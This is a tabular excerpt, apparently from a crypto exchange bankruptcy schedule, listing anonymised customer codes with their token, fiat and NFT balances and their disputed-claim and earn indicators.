| 07359891 | | BRZ[5.07952967], BTC[.00187322], CUSDT[19], GRT[1.00498957], SOL[21.98317967], TRX[5], USD[0.00], USDT[1.10515011] | Yes | |
| 07359892 | | SHIB[1394700.13947001], USD[0.19] | | |
| 07359893 | | USD[0.00] | Yes | |
| 07359894 | | USD[10.00] | | |
| 07359896 | | USD[10.00] | | |
| 07359897 | | DOGE[559.22044177], USD[0.00] | | |
| 07359898 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07359899 | | DOGE[.014], USD[0.08] | | |
| 07359900 | | CUSDT[1], DOGE[39.6460604], ETH[.00000397], USD[0.00] | | |
| 07359901 | | USD[10.00] | | |
| 07359902 | | USD[0.00] | | |
| 07359904 | | USD[10.00] | | |
| 07359906 | | CUSDT[1], DOGE[1], GRT[120.83786072], USD[0.00], USDT[0] | | |
| 07359907 | | SOL[152.847], USD[7.21] | | |
| 07359908 | | DOGE[799.31755029], USD[0.00] | Yes | |
| 07359909 | | CUSDT[1], USD[10.00] | | |
| 07359910 | | CUSDT[4], DOGE[84.48478666], TRX[1], USD[0.00] | | |
| 07359911 | | BTC[.0001707], USD[0.00] | | |
| 07359913 | | USD[10.00] | | |
| 07359914 | | USD[0.00] | Yes | |
| 07359916 | | USD[10.00] | | |
| 07359917 | | BTC[.0005976], USD[2.86] | | |
| 07359919 | | BRZ[2], DOGE[.00516194], GRT[2], SOL[.33885753], TRX[597.47183331], USD[0.01] | | |
| 07359920 | | USD[10.00] | | |
| 07359921 | | USD[10.00] | | |
| 07359922 | | BRZ[0], CUSDT[665.47381015], DOGE[100.09623293], TRX[436.68629033], USD[0.00] | Yes | |
| 07359923 | | USD[10.00] | | |
| 07359924 | | USD[10.00] | | |
| 07359925 | | USD[10.00] | | |
| 07359926 | | USD[10.00] | | |
| 07359927 | | BAT[2], BRZ[1], BTC[0], CUSDT[3], ETH[0], LINK[.01811559], NFT [425225715228660837/Series 1: Capitals #1319][1], NFT [494159547365818977/Series 1: Wizards #1239][1], TRX[0], USD[0.00], USDT[1] | | |
| 07359928 | | DOGE[161.18445501], USD[1.00] | | |
| 07359929 | | USD[10.00] | | |
| 07359931 | | SHIB[62651.45652238], USD[0.01] | Yes | |
| 07359932 | | USD[10.00] | | |
| 07359933 | | DOGE[1], USD[0.19] | | |
| 07359934 | Contingent, Disputed | USD[0.00] | Yes | |
| 07359936 | | BAT[3.52993059], CUSDT[1], DOGE[152.759658], GRT[1], TRX[3], USD[0.00] | | |
| 07359937 | | USD[0.00] | | |
| 07359940 | | USD[0.00] | | |
| 07359941 | | USD[0.01] | | |
| 07359942 | | CUSDT[17.00718408], DOGE[3], ETH[0], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07359943 | | USD[10.00] | | |
| 07359945 | | DOGE[474.80509199], USD[0.00] | | |
| 07359946 | | DOGE[175.89592589], USD[0.00] | | |
| 07359947 | | BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0.00011535], ETHW[0.00011535], LTC[0], USD[0.00], USDT[0.00000227] | Yes | |
| 07359948 | | BRZ[1], CUSDT[4], DOGE[161.16100075], SOL[0], TRX[1], USD[0.00] | | |
| 07359949 | | USD[10.00] | | |
| 07359950 | | USD[10.00] | | |
| 07359951 | | GRT[6.08621537], USD[0.00] | | |
| 07359952 | | CUSDT[3], USD[0.00] | | |
| 07359953 | | USD[10.00] | | |
| 07359954 | | BAT[265.65217471], CUSDT[4], DOGE[1501.95100429], GRT[71.81707886], TRX[2089.18031783], USD[7.57], USDT[55.19342798] | Yes | |
| 07359955 | | USD[10.00] | | |
| 07359956 | | USD[10.00] | | |
| 07359958 | | USD[0.01] | | |
| 07359963 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359964 | | USD[10.00] | | |
| 07359965 | | DOGE[.664], USD[459.22] | | |
| 07359966 | | CUSDT[1], DOGE[921.80811863], ETH[.00109569], ETHW[0.00109569], GRT[1], TRX[2], USD[0.53], USDT[0.00000001] | | |
| 07359967 | | DOGE[28.17367062], TRX[1], USD[0.00] | | |
| 07359968 | | BTC[.00000001], MATIC[.00041242], USD[444.12] | Yes | |
| 07359969 | | USD[10.00] | | |
| 07359971 | | CUSDT[1], USD[0.00] | | |
| 07359972 | | BAT[51.51651751], BCH[.46440223], BTC[.00404786], CUSDT[17], DOGE[3050.3064835], ETH[.1501214], ETHW[.1501214], GRT[6.60380103], KSHIB[158.74958665], LINK[.17678552], LTC[.01113379], SHIB[318319.27423205], SOL[9.12153537], SUSHI[2.96975025], TRX[238.65371618], UNI[.24576625], USD[51.02], USDT[1.98861594] | | |
| 07359973 | | USD[10.00] | | |
| 07359974 | | BTC[.00029551], CUSDT[1], USD[0.00] | Yes | |
| 07359975 | | CUSDT[6], TRX[4], USD[0.00] | | |
| 07359976 | | USD[10.00] | | |
| 07359977 | | BRZ[1], CUSDT[13], TRX[1], USD[0.04] | | |
| 07359978 | | USD[0.01] | | |
| 07359979 | | BCH[.19316558], BRZ[1], BTC[.00000096], CUSDT[3], DOGE[1667.26667498], ETH[.00000819], ETHW[.54725116], GRT[1.00498957], LTC[1.58031691], SOL[9.06425398], USD[12.50] | Yes | |
| 07359980 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07359981 | | CUSDT[13], TRX[4], USD[0.00] | | |
| 07359982 | | USD[0.00] | | |
| 07359984 | | USD[10.00] | | |
| 07359986 | | USD[10.00] | | |
| 07359987 | | CUSDT[4], DOGE[4], GRT[1], USD[0.01] | | |
| 07359988 | | CUSDT[5], DOGE[0], TRX[1], USD[0.00] | | |
| 07359989 | | BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], USD[0.00], USDT[0.00001417] | Yes | |
| 07359990 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00], USDT[1.07629521] | Yes | |
| 07359991 | | USD[10.00] | | |
| 07359992 | | BTC[.00000749], TRX[331.0421], USD[0.00], USDT[0] | | |
| 07359993 | | BAT[0], BRZ[1], CUSDT[1], DOGE[2], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], TRX[3], UNI[0], USD[0.01], USDT[0] | | |
| 07359994 | | USD[10.00] | | |
| 07359995 | | USD[11.02] | Yes | |
| 07359996 | | CUSDT[1], DOGE[1], USD[0.70] | | |
| 07359997 | | BAT[1], BTC[.1], CUSDT[1], DOGE[2], ETH[1.41208222], ETHW[1.41208222], SOL[15.84161673], TRX[4], USD[0.00] | | |
| 07359998 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07359999 | | DOGE[1], SUSHI[0], UNI[0], USD[0.00] | | |
| 07360000 | | BTC[.01695191], DOGE[5190.35070221], ETH[.26502866], ETHW[.26502866], USD[0.00] | | |
| 07360001 | | USD[10.00] | | |
| 07360003 | | DOGE[1769.69873134], USD[11.09] | Yes | |
| 07360004 | | DOGE[3], USD[0.01] | | |
| 07360005 | | BTC[0.00212642], DOGE[1.62843864], SHIB[2], USD[0.00] | Yes | |
| 07360006 | | USD[0.00] | | |
| 07360008 | | USD[10.00] | | |
| 07360009 | | USD[10.00] | | |
| 07360011 | | USD[0.00] | | |
| 07360012 | | USD[10.00] | | |
| 07360014 | | CUSDT[1], DOGE[1], USD[50.62] | | |
| 07360015 | | USD[10.00] | | |
| 07360016 | | BRZ[2], CUSDT[1], DOGE[5], GRT[.00001716], USD[0.00] | | |
| 07360017 | | DOGE[289.16058417], USD[10.00] | | |
| 07360018 | | USD[10.00] | | |
| 07360019 | | CUSDT[1], DOGE[25.94399492], USD[0.01] | | |
| 07360020 | | DOGE[1], USD[0.00] | | |
| 07360022 | | CUSDT[1], DOGE[2], ETH[.13740567], ETHW[.13634692], USD[0.00] | Yes | |
| 07360023 | | ETH[0], SOL[0], SUSHI[0], USD[0.01] | | |
| 07360024 | | LTC[.06345734], USD[0.00] | Yes | |
| 07360025 | | USD[10.00] | | |
| 07360026 | | BRZ[2], CUSDT[9], DOGE[15438.64992886], SOL[6.53600381], TRX[4], USD[0.00] | Yes | |
| 07360027 | | USD[10.00] | | |
| 07360028 | | CUSDT[7], DOGE[5], ETH[0], GRT[1], SOL[0], TRX[10.86773032], USD[0.42], USDT[1] | | |
| 07360029 | | CUSDT[1], DOGE[3206.89838811], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360030 | | CUSDT[4], GRT[1], TRX[3], USD[0.00] | | |
| 07360031 | | DOGE[2], ETH[1.00572128], ETHW[1.00572128], TRX[580.70484119], USD[0.00] | | |
| 07360032 | | USD[200.00], USDT[3.926451], YFI[.026] | | |
| 07360033 | | USD[10.00] | | |
| 07360034 | | AUD[0.00], ETH[0], ETHW[0], SGD[0.00], USD[20.52] | Yes | |
| 07360035 | | CUSDT[1.37329393], DOGE[1123.0727982], SHIB[2029175.73665534], TRX[2199.04711395], USD[0.01] | Yes | |
| 07360036 | | CUSDT[2], DOGE[3302.45473823], TRX[1], USD[0.00] | | |
| 07360037 | | USD[10.00] | | |
| 07360038 | | CUSDT[1.979], TRX[1.767], USD[0.16], USDT[0] | | |
| 07360039 | | AVAX[0], BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], KSHIB[0], LINK[0], LTC[0], MATIC[0], SHIB[11.63397480], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07360040 | | ETH[.00000001], ETHW[0.57476763], USD[0.00] | | |
| 07360042 | | CUSDT[1], DOGE[7955.59326109], SHIB[1891873.69445554], SOL[11.18054941], SUSHI[21.55155862], TRX[1], USD[1.72] | Yes | |
| 07360043 | | USD[10.00] | | |
| 07360045 | | USD[10.00] | | |
| 07360047 | | BTC[0], DOGE[0], ETH[0], ETHW[0], SHIB[1264505.40102295], USD[0.00] | Yes | |
| 07360048 | | USD[10.00] | | |
| 07360049 | | USD[10.00] | | |
| 07360051 | | BF_POINT[2900], BTC[0.00000014], ETH[0.00000825], ETHW[0.00000825], GRT[0], SUSHI[0], USD[0.00] | Yes | |
| 07360053 | | BTC[0], CUSDT[1], DOGE[0], LTC[0], SOL[1150475], SUSHI[0], USD[0.00] | Yes | |
| 07360054 | | CUSDT[3], DOGE[0], SOL[6.20068876], TRX[1], USD[0.00] | | |
| 07360055 | | USD[10.00] | | |
| 07360056 | | USD[10.00] | | |
| 07360057 | | USD[0.00] | | |
| 07360058 | | USD[10.00] | | |
| 07360061 | | USD[10.00] | | |
| 07360062 | | USD[10.00] | | |
| 07360063 | | USD[10.00] | | |
| 07360064 | | BCH[.01212353], CUSDT[1], DOGE[0], ETH[0], ETHW[0], SHIB[1], USD[0.03] | | |
| 07360065 | | BAT[0], CUSDT[4], DOGE[8.39758009], ETH[0], LINK[0], SUSHI[0], TRX[0], USD[0.17], USDT[0.00000121] | | |
| 07360066 | | SOL[1.14474355], USD[0.00] | Yes | |
| 07360067 | | DOGE[1], USD[0.00] | | |
| 07360068 | | BAT[5.00513351], BRZ[4], CUSDT[7], DOGE[4.42936767], ETH[.01220807], ETHW[.01205759], GRT[1.86414011], MATIC[114.11754028], TRX[60.09574192], USD[1.23], USDT[118.78411056] | Yes | |
| 07360069 | | DOGE[1.89896495], USD[0.00] | Yes | |
| 07360070 | | USD[10.00] | | |
| 07360072 | | USD[10.00] | | |
| 07360073 | | USD[10.56] | Yes | |
| 07360075 | | CUSDT[2], DOGE[1.00079828], ETH[.00472427], ETHW[.00466955], USD[105.15] | Yes | |
| 07360076 | | BTC[.00003168], CUSDT[1], DOGE[27.775284], USD[0.00] | | |
| 07360077 | | USD[10.00] | | |
| 07360078 | | BRZ[2], CUSDT[1], DOGE[2], TRX[2], USD[0.00] | | |
| 07360079 | | BAT[1.01585017], BCH[.04595127], BRZ[57.74567435], CUSDT[34], DOGE[4163.81542287], ETH[.10271585], ETHW[.10166234], LTC[.08171452], SHIB[18106509.82753464], SOL[.60952882], TRX[84.88794326], USD[0.12] | Yes | |
| 07360080 | | SHIB[1], USD[24.55] | | |
| 07360081 | | DOGE[24.975], USD[23.01] | | |
| 07360082 | | BTC[.02526851], CUSDT[1], DOGE[5027.19568462], TRX[10006.75779896], USD[0.01] | | |
| 07360084 | | BAT[81.85644189], CUSDT[3.00002977], DOGE[.00455154], ETH[.01927157], ETHW[.01927157], LTC[.24044914], MATIC[2.06635564], SOL[13.106792], TRX[472.06163014], USD[0.00] | | |
| 07360085 | | BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | | |
| 07360086 | | BAT[0], CUSDT[2], NFT [393602687022670479/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #50/1], SOL[0], USD[3.11] | Yes | |
| 07360087 | | USD[10.00] | | |
| 07360088 | | DOGE[147.30914075], USD[0.00] | | |
| 07360089 | | BTC[.00216131], CUSDT[2], DOGE[34312.88520859], USD[0.00] | | |
| 07360090 | | BAT[1.01522217], BRZ[3], CUSDT[5], DAI[21.85375813], DOGE[63218.39002375], ETH[.00580696], ETHW[.00573856], GRT[24.43406993], SOL[7.042559], SUSHI[1.51665801], TRX[631.87163678], UNI[2.54816594], USD[0.00] | Yes | |
| 07360091 | | BRZ[1], USD[110.00] | | |
| 07360093 | | DOGE[1], USD[0.00], USDT[9.94208625] | | |
| 07360095 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], ETHW[0], KSHIB[8.45518332], LINK[0], TRX[2], USD[0.00] | Yes | |
| 07360096 | | USD[10.00] | | |
| 07360097 | | USD[10.00] | | |
| 07360098 | | USD[10.00] | | |
| 07360099 | | USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360100 | | BRZ[1], GRT[0], LTC[0], SOL[0], TRX[3], USD[0.00], USDT[0.00000001] | | |
| 07360102 | | BTC[0], TRX[5.36820663], USD[0.00] | Yes | |
| 07360103 | Contingent, Disputed | BRZ[0], BTC[0], DOGE[0], LTC[0], USD[0.00], USDT[0] | | |
| 07360104 | | USD[10.00] | | |
| 07360105 | | USD[10.00] | | |
| 07360106 | | USD[10.00] | | |
| 07360107 | | USD[0.01] | Yes | |
| 07360108 | | GRT[9.089796], USD[0.00] | | |
| 07360109 | | USD[10.00] | | |
| 07360110 | | USD[10.00] | | |
| 07360112 | | BTC[0], ETH[0], ETHW[0], SOL[0], USD[0.00], USDT[0] | | |
| 07360113 | | CUSDT[1], TRX[4], USD[0.00] | | |
| 07360114 | | USD[0.00] | | |
| 07360115 | | USD[10.00] | | |
| 07360116 | | BRZ[4], CUSDT[9], DOGE[0], ETHW[.11826572], GRT[30.62307069], LINK[1.89149732], SHIB[3], SUSHI[.01237951], TRX[3], USD[792.09] | Yes | |
| 07360117 | | USD[0.01] | | |
| 07360118 | | USD[10.00] | | |
| 07360119 | | CUSDT[10], DOGE[5345.99688048], ETH[0], GRT[51.60337603], LINK[4.66859968], LTC[0], SHIB[2435.30965929], SOL[3.03008227], TRX[215.83494257], USD[78.73], USDT[0] | | |
| 07360120 | | BTC[.00215343], TRX[1], USD[2.11] | | |
| 07360121 | | USD[10.00] | | |
| 07360122 | | USD[0.00], USDT[0], YFI[0] | | |
| 07360123 | | USD[10.00] | | |
| 07360124 | | CUSDT[4], DOGE[6559.32509872], TRX[4958.36509135], USD[0.00] | Yes | |
| 07360125 | | CUSDT[5], DOGE[805.42644121], TRX[2], USD[0.00] | | |
| 07360126 | | DOGE[177.55536797], TRX[1], USD[0.00] | | |
| 07360127 | | USD[10.00] | | |
| 07360128 | | USD[10.94] | Yes | |
| 07360129 | | USD[10.00] | | |
| 07360130 | | USD[10.00] | | |
| 07360131 | | DOGE[3.35908188], USD[0.01] | | |
| 07360133 | | USD[10.00] | | |
| 07360134 | | USD[10.00] | | |
| 07360135 | | BAT[7.67190591], CUSDT[3], DOGE[1], LINK[2.20920205], SUSHI[1.10356058], TRX[9.00076743], USD[0.01], USDT[5.5230056] | Yes | |
| 07360136 | | CUSDT[7], ETH[.00000068], ETHW[.00000068], TRX[2], USD[0.00] | | |
| 07360137 | | USD[0.00], USDT[0] | | |
| 07360138 | | BRZ[1], DOGE[1], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07360139 | | USD[10.00] | | |
| 07360140 | | USD[10.00] | | |
| 07360141 | | DOGE[511.92887419], USD[0.00] | | |
| 07360142 | | USD[10.00] | | |
| 07360144 | | USD[0.00] | | |
| 07360145 | | BTC[0], DOGE[0], LTC[0], SHIB[2570.72883923], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07360146 | | CUSDT[2], DOGE[4.04056949], USD[0.00] | Yes | |
| 07360147 | | USD[0.00] | Yes | |
| 07360148 | | CUSDT[0], KSHIB[0], SHIB[23197.37382142], SOL[0], TRX[0], USD[0.01], USDT[0] | Yes | |
| 07360151 | | CUSDT[6], SOL[.05483171], TRX[1], USD[0.00] | Yes | |
| 07360152 | | USD[10.00] | | |
| 07360153 | | USD[0.09] | Yes | |
| 07360154 | | USD[10.00] | | |
| 07360155 | | BRZ[1], CUSDT[7], TRX[1], USD[0.01] | | |
| 07360157 | | CUSDT[2], DOGE[146.09597637], TRX[1], USD[0.00] | | |
| 07360158 | | USD[10.00] | | |
| 07360159 | | CUSDT[1], DOGE[4562.78040698], SHIB[7428047.92224956], TRX[.308599], USD[0.00] | Yes | |
| 07360161 | | USD[10.00] | | |
| 07360162 | | DOGE[179.0257704], USD[0.00] | | |
| 07360163 | | DOGE[349.04228408], USD[0.00] | | |
| 07360164 | | USD[0.00] | | |
| 07360165 | | CUSDT[3], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360166 | | USD[0.00], YFI[.00030208] | Yes | |
| 07360167 | | CUSDT[1], DOGE[4672.80598153], TRX[1825.26486284], USD[0.00] | Yes | |
| 07360168 | | USD[10.00] | | |
| 07360169 | | BTC[.00010825], DOGE[1], ETH[.00310556], ETHW[.00306452], USD[0.00] | Yes | |
| 07360170 | | USD[10.00] | | |
| 07360171 | | USD[10.00] | | |
| 07360172 | | DOGE[0], KSHIB[0], LINK[0], MATIC[0], SHIB[72058928.10604898], SOL[0], USD[0.00] | Yes | |
| 07360173 | | USD[10.00] | | |
| 07360174 | | USD[10.00] | | |
| 07360175 | | NFT (450346549891600190/Coachella x FTX Weekend 2 #7255)[1], USD[10.00] | | |
| 07360176 | | USD[10.00] | | |
| 07360177 | | CUSDT[2], KSHIB[1275.67175507], SHIB[1], TRX[1.00290976], USD[1.03], USDT[0.00045134] | Yes | |
| 07360178 | | BTC[.00018734], USD[0.00] | | |
| 07360179 | | USD[10.00] | | |
| 07360180 | | USD[10.00] | | |
| 07360181 | | BTC[.00017529], USD[0.00] | | |
| 07360182 | | BAT[3], BRZ[5], CUSDT[5], DOGE[4], TRX[5], USD[0.01], USDT[4] | | |
| 07360184 | | USD[10.00] | | |
| 07360185 | | BAT[1], BTC[0.00003065], GRT[1], SOL[1], USD[0.99], USDT[2.91436830] | | |
| 07360187 | | BRZ[1], CUSDT[96.68949707], DOGE[141.2142196], TRX[140.08481517], USD[0.74] | | |
| 07360188 | | USD[10.00] | | |
| 07360189 | | USD[0.00], USDT[1] | | |
| 07360190 | | CUSDT[3], DOGE[.00002549], USD[0.00] | | |
| 07360191 | | USD[10.00] | | |
| 07360192 | | DOGE[198.57648461], USD[0.00] | | |
| 07360193 | | CUSDT[5], DOGE[.03014782], TRX[6], USD[0.01] | | |
| 07360194 | | USD[10.00] | | |
| 07360195 | | USD[10.00] | | |
| 07360197 | | BTC[0], ETH[0], GBP[0.00], LINK[0], LTC[0], TRX[0], UNI[0], USD[0.00] | | |
| 07360198 | | CUSDT[4], DOGE[797.94989879], TRX[1], USD[0.00], USDT[0] | | |
| 07360199 | | DOGE[2734.33303073], SHIB[979161.85289237], USD[0.00] | Yes | |
| 07360200 | | BRZ[1], CUSDT[2], DOGE[494.28385805], SHIB[2876319.31255992], USD[0.02] | | |
| 07360201 | | BAT[1], TRX[1], USD[0.01] | | |
| 07360202 | | CUSDT[1], TRX[218.34381755], USD[0.00] | Yes | |
| 07360204 | | USD[0.00] | | |
| 07360205 | | USD[10.00] | | |
| 07360206 | | USD[10.00] | | |
| 07360209 | | USD[0.00] | | |
| 07360211 | | USD[10.00] | | |
| 07360213 | | USD[10.00] | | |
| 07360215 | | BRZ[2], CUSDT[17], DOGE[0], ETH[0.00000007], ETHW[0.00000007], GRT[0], SOL[0], TRX[5], USD[0.00] | Yes | |
| 07360218 | | CUSDT[5], SUSHI[2.59900525], TRX[717.55164116], USD[0.00] | Yes | |
| 07360219 | | BTC[.00021294], USD[0.00] | | |
| 07360220 | | USD[10.00] | | |
| 07360224 | | CUSDT[1], TRX[118.47246344], USD[0.00] | | |
| 07360225 | | BTC[0], ETH[.0025], ETHW[0.00030622], SOL[.00955], USD[52.77] | | |
| 07360227 | | SUSHI[0], TRX[.07929022], USD[0.00] | Yes | |
| 07360228 | | USD[10.00] | | |
| 07360229 | | BRZ[1.00194820], BTC[0], CUSDT[1], DOGE[2.00163171], ETH[0], TRX[1], USD[0.01] | | |
| 07360230 | | USD[10.00] | | |
| 07360231 | | CUSDT[469.44748539], DOGE[.81343886], USD[0.00] | | |
| 07360232 | | BAT[1.00976422], NFT (300866001442995444/Warriors 75th Anniversary City Edition Diamond #1095)[1], NFT (369787384543969594/Warriors 75th Anniversary Icon Edition Diamond #1226)[1], TRX[1], USD[0.01], USDT[1.07766233] | Yes | |
| 07360233 | | BRZ[0], DOGE[0], ETH[0], ETHW[0], GRT[0], USD[0.00] | | |
| 07360234 | | USD[10.00] | | |
| 07360235 | | BAT[1.0165555], BRZ[1], CUSDT[2], DOGE[1], ETH[2.04732253], ETHW[2.04646268], GRT[1.00367791], TRX[1], USD[0.02] | Yes | |
| 07360236 | | USD[10.00] | | |
| 07360237 | | USD[10.00] | | |
| 07360238 | | DOGE[21.48255445], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360240 | | BAT[0], BTC[0], ETH[0], GRT[0], LINK[0], SUSHI[0], TRX[1], UNI[0], USD[0.00], USDT[1], YFI[0] | | |
| 07360241 | | AAVE[0], AUD[0.00], BAT[0], BCH[0], BRZ[0], BTC[0], CAD[0.00], CUSDT[0], DAI[0], DOGE[0], ETH[0], EUR[0.00], GBP[0.00], GRT[0], KSHIB[0], LINK[0], LTC[0], MATIC[0], MKR[0], PAXG[0], SGD[0.00], SHIB[1], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07360242 | | CUSDT[1], DOGE[1], GRT[26.66010345], LINK[0.33631547], TRX[1], USD[0.00] | | |
| 07360243 | | USD[10.00] | | |
| 07360244 | | DOGE[46.9720825], USD[0.00] | | |
| 07360245 | | USD[10.00] | | |
| 07360246 | | USD[10.00] | | |
| 07360247 | | ETH[4.41531728], ETHW[4.33115943], NFT (495804489542496231/Entrance Voucher #1883)[1], SHIB[2], SOL[44.79971343], USD[100.01] | Yes | |
| 07360248 | | BTC[0], USD[0.00], USDT[0] | Yes | |
| 07360249 | | BAT[5.84048866], USD[0.00], USDT[0] | | |
| 07360251 | | USD[10.00] | | |
| 07360252 | Contingent, Disputed | TRX[1], USD[0.00] | Yes | |
| 07360253 | | USD[10.00] | | |
| 07360254 | | BTC[.00003836], ETH[0], USD[0.00], USDT[0] | | |
| 07360255 | | USD[10.00] | | |
| 07360256 | | BTC[.00019261], USD[0.00] | | |
| 07360257 | | BRZ[2], CUSDT[5], DOGE[86.90894146], SHIB[1], TRX[1], USD[99.58] | Yes | |
| 07360259 | | USD[10.00] | | |
| 07360260 | | DOGE[1], USD[0.00] | | |
| 07360261 | | BRZ[1], CUSDT[2], TRX[1], USD[0.00], USDT[0.00000008] | Yes | |
| 07360262 | | USD[10.00] | | |
| 07360264 | | BTC[.00000112], DOGE[45.18087616], USD[0.00] | Yes | |
| 07360265 | | USD[10.00] | | |
| 07360266 | | BRZ[6], CUSDT[5], TRX[2], USD[0.00] | | |
| 07360267 | | BRZ[1], CUSDT[4], DOGE[0], TRX[1.68817579], USD[0.03] | Yes | |
| 07360268 | | BAT[1], BRZ[1], CUSDT[1], DOGE[5738.06317972], USD[0.00] | | |
| 07360269 | | BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07360270 | | ETH[.0023929], ETHW[.0023929], USD[0.00] | | |
| 07360271 | | USD[10.00] | | |
| 07360272 | | CUSDT[.03304334], DOGE[2058.4830479], USD[1.06] | Yes | |
| 07360273 | | USD[10.00] | | |
| 07360274 | | DOGE[106.39820139], ETH[.00324443], ETHW[.00320336], USD[0.00] | Yes | |
| 07360275 | | USD[10.00] | | |
| 07360276 | | USD[10.00] | | |
| 07360277 | | USD[193.03] | | |
| 07360278 | | USD[10.00] | | |
| 07360279 | | BTC[.0002764], DOGE[1], USD[0.01] | | |
| 07360281 | | USD[10.00] | | |
| 07360282 | | BAT[2], BRZ[1], CUSDT[9], GRT[1], LINK[1], TRX[8], USD[0.00], USDT[1] | | |
| 07360283 | | USD[10.00] | | |
| 07360284 | | DOGE[1.01355835], TRX[.91706332], USD[10.00] | | |
| 07360285 | | USD[0.01], USDT[0] | Yes | |
| 07360286 | | USD[10.00] | | |
| 07360287 | | BAT[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], USD[0.00], YFI[0] | | |
| 07360288 | | DOGE[206.34265606], USD[10.86] | | |
| 07360289 | | USD[10.00] | | |
| 07360290 | | DOGE[202.91754851], USD[0.00] | | |
| 07360291 | | BTC[.00000004], DOGE[1.52425597], ETHW[2.50066448], USD[0.04] | Yes | |
| 07360292 | | BRZ[0], BTC[.0000004], CUSDT[2], DOGE[1], TRX[943.35644957], USD[366.91] | Yes | |
| 07360293 | | DOGE[122.3882051], USD[0.00] | | |
| 07360294 | | USD[10.00] | | |
| 07360295 | | CUSDT[3], DOGE[35.64075069], ETH[.0000002], ETHW[.0000002], GRT[61.50412814], SHIB[1199971.74426146], SOL[2.27100067], SUSHI[1.08547519], TRX[474.9841857], USD[0.00] | Yes | |
| 07360296 | | CUSDT[1], SHIB[1], USD[25.06] | Yes | |
| 07360297 | | BRZ[1], DOGE[4.000548], ETH[0], ETHW[0], GRT[2], SOL[.00001826], TRX[2], USD[1.62], USDT[1.0956714] | Yes | |
| 07360298 | | DOGE[1], USD[0.01] | | |
| 07360299 | | BTC[0], CUSDT[2], ETH[0], ETHW[0], TRX[1], USD[0.00], USDT[0] | | |
| 07360301 | | BTC[.00000044], CUSDT[3], DOGE[1], USD[0.00] | Yes | |
| 07360302 | | BTC[.00002732], ETH[.00045881], ETHW[.00045881], USD[1249.02], USDT[2.1800832] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360303 | | USDT[3.805966] | | |
| 07360304 | | CUSDT[4], DOGE[75.24309809], ETH[.00588776], ETHW[.00588776], TRX[2], USD[20.36] | | |
| 07360305 | | DOGE[1], ETH[.00001499], ETHW[1.64193642], GRT[1.0030951], TRX[1], USD[0.00] | Yes | |
| 07360306 | | USD[10.00] | | |
| 07360308 | | BCH[.00003682], BRZ[1], CUSDT[4], DOGE[48.03071139], TRX[1], USD[0.00] | | |
| 07360309 | | USD[10.00] | | |
| 07360310 | | CUSDT[58], DAI[0], DOGE[2], ETH[0], TRX[2], USD[0.00], USDT[0] | | |
| 07360311 | | USD[10.00] | | |
| 07360312 | | BTC[.00008763], DOGE[14.48978426], ETH[.00226103], ETHW[.00226103], LTC[.00524792], USD[0.00] | | |
| 07360313 | | USD[10.00] | | |
| 07360314 | | AAVE[0], BAT[.212541], BRZ[1], CUSDT[3], MATIC[0], USD[0.00] | Yes | |
| 07360316 | | USD[10.00] | | |
| 07360318 | | USD[10.00] | | |
| 07360319 | | USD[10.00] | | |
| 07360320 | | CUSDT[6], DOGE[67.62458728], TRX[1], USD[0.27] | Yes | |
| 07360321 | | USD[10.00] | | |
| 07360322 | | USD[10.00] | | |
| 07360323 | | BAT[0], BRZ[4], CUSDT[32], DOGE[509.16823338], ETH[0], GRT[115.34103960], LTC[.00000765], MATIC[39.05617565], SOL[0], SUSHI[0], TRX[102.48902201], USD[0.00], USDT[0] | Yes | |
| 07360324 | | USD[10.00] | | |
| 07360325 | | USD[10.00] | | |
| 07360326 | | CUSDT[1], USD[0.01] | | |
| 07360327 | | USD[0.01], USDT[0] | | |
| 07360329 | | BTC[.00005118], USD[7.00] | | |
| 07360330 | | USD[10.00] | | |
| 07360331 | | USD[10.00] | | |
| 07360333 | | USD[10.00] | | |
| 07360336 | | BAT[.49721973], BCH[.14640021], BRZ[2], CUSDT[1044.16762817], DOGE[1414.81003294], ETH[.2333005], ETHW[.18932987], GRT[6.71747479], LTC[.39030532], SHIB[1], SOL[1.62703331], SUSHI[1.26974223], TRX[183.84421655], UNI[.93710701], USD[0.00], USDT[21.90867101] | Yes | |
